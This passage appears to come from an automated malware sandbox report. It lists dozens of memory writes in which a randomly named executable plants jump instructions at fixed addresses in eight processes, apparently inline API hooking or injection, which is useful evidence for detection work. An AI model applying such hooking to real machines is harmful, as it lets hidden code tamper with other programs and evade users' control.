            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 7576DF21 value: E9 EA 45 DA 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 75709AE0 value: E9 8B 8A E0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 756F5366 value: E9 55 BE E1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 756F3EFC value: E9 8F D3 E1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 69CBA9B0 value: E9 3B 6D 85 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 69CA572C value: E9 AF C0 86 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 769A6C19 value: E9 32 06 B7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 769A4889 value: E9 82 D4 B6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 76A91D20 value: E9 7B 03 A8 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 76A0BF10 value: E9 4B 62 B0 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 76A81610 value: E9 8B 0D A9 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 774D0078 value: E9 53 53 04 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1668 base: 774EEB2A value: E9 D1 67 02 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 774CFA50 value: E9 3B 69 CC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 774CFDA8 value: E9 93 68 CC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 757158CD value: E9 2E B7 A7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 757182ED value: E9 AE 8D A7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 7576DF21 value: E9 EA 45 A2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 75709AE0 value: E9 8B 8A A8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 756F5366 value: E9 55 BE A9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 756F3EFC value: E9 8F D3 A9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 69CBA9B0 value: E9 3B 6D 4D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 69CA572C value: E9 AF C0 4E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 769A6C19 value: E9 32 06 7F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 769A4889 value: E9 82 D4 7E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 76A91D20 value: E9 7B 03 70 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 76A0BF10 value: E9 4B 62 78 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 76A81610 value: E9 8B 0D 71 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 774D0078 value: E9 53 53 CC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2836 base: 774EEB2A value: E9 D1 67 CA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 774CFA50 value: E9 3B 69 37 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 774CFDA8 value: E9 93 68 37 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 757158CD value: E9 2E B7 12 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 757182ED value: E9 AE 8D 12 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 7576DF21 value: E9 EA 45 0D 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 75709AE0 value: E9 8B 8A 13 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 756F5366 value: E9 55 BE 14 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 756F3EFC value: E9 8F D3 14 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 69CBA9B0 value: E9 3B 6D B8 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 69CA572C value: E9 AF C0 B9 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 769A6C19 value: E9 32 06 EA 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 769A4889 value: E9 82 D4 E9 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 76A91D20 value: E9 7B 03 DB 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 76A0BF10 value: E9 4B 62 E3 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 76A81610 value: E9 8B 0D DC 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 774D0078 value: E9 53 53 37 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1756 base: 774EEB2A value: E9 D1 67 35 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 774CFA50 value: E9 3B 69 F3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 774CFDA8 value: E9 93 68 F3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 757158CD value: E9 2E B7 CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 757182ED value: E9 AE 8D CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 7576DF21 value: E9 EA 45 C9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 75709AE0 value: E9 8B 8A CF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 756F5366 value: E9 55 BE D0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 756F3EFC value: E9 8F D3 D0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 69CBA9B0 value: E9 3B 6D 74 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 69CA572C value: E9 AF C0 75 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 769A6C19 value: E9 32 06 A6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 769A4889 value: E9 82 D4 A5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 76A91D20 value: E9 7B 03 97 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 76A0BF10 value: E9 4B 62 9F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 76A81610 value: E9 8B 0D 98 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 774D0078 value: E9 53 53 F3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2672 base: 774EEB2A value: E9 D1 67 F1 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 774CFA50 value: E9 3B 69 35 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 774CFDA8 value: E9 93 68 35 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 757158CD value: E9 2E B7 10 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 757182ED value: E9 AE 8D 10 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 7576DF21 value: E9 EA 45 0B 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 75709AE0 value: E9 8B 8A 11 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 756F5366 value: E9 55 BE 12 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 756F3EFC value: E9 8F D3 12 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 69CBA9B0 value: E9 3B 6D B6 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 69CA572C value: E9 AF C0 B7 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 769A6C19 value: E9 32 06 E8 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 769A4889 value: E9 82 D4 E7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 76A91D20 value: E9 7B 03 D9 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 76A0BF10 value: E9 4B 62 E1 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 76A81610 value: E9 8B 0D DA 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 774D0078 value: E9 53 53 35 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2708 base: 774EEB2A value: E9 D1 67 33 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 774CFA50 value: E9 3B 69 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 774CFDA8 value: E9 93 68 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 757158CD value: E9 2E B7 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 757182ED value: E9 AE 8D 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 7576DF21 value: E9 EA 45 92 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 75709AE0 value: E9 8B 8A 98 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 756F5366 value: E9 55 BE 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 756F3EFC value: E9 8F D3 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 69CBA9B0 value: E9 3B 6D 3D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 69CA572C value: E9 AF C0 3E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 769A6C19 value: E9 32 06 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 769A4889 value: E9 82 D4 6E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 76A91D20 value: E9 7B 03 60 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 76A0BF10 value: E9 4B 62 68 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 76A81610 value: E9 8B 0D 61 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 774D0078 value: E9 53 53 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2704 base: 774EEB2A value: E9 D1 67 BA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 774CFA50 value: E9 3B 69 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 774CFDA8 value: E9 93 68 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 757158CD value: E9 2E B7 EB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 757182ED value: E9 AE 8D EB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 7576DF21 value: E9 EA 45 E6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 75709AE0 value: E9 8B 8A EC 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 756F5366 value: E9 55 BE ED 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 756F3EFC value: E9 8F D3 ED 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 69CBA9B0 value: E9 3B 6D 91 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 69CA572C value: E9 AF C0 92 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 769A6C19 value: E9 32 06 C3 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 769A4889 value: E9 82 D4 C2 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 76A91D20 value: E9 7B 03 B4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 76A0BF10 value: E9 4B 62 BC 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 76A81610 value: E9 8B 0D B5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 774D0078 value: E9 53 53 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2868 base: 774EEB2A value: E9 D1 67 0E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 774CFA50 value: E9 3B 69 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 774CFDA8 value: E9 93 68 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 757158CD value: E9 2E B7 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 757182ED value: E9 AE 8D 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 7576DF21 value: E9 EA 45 92 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 75709AE0 value: E9 8B 8A 98 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 756F5366 value: E9 55 BE 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 756F3EFC value: E9 8F D3 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 69CBA9B0 value: E9 3B 6D 3D 96
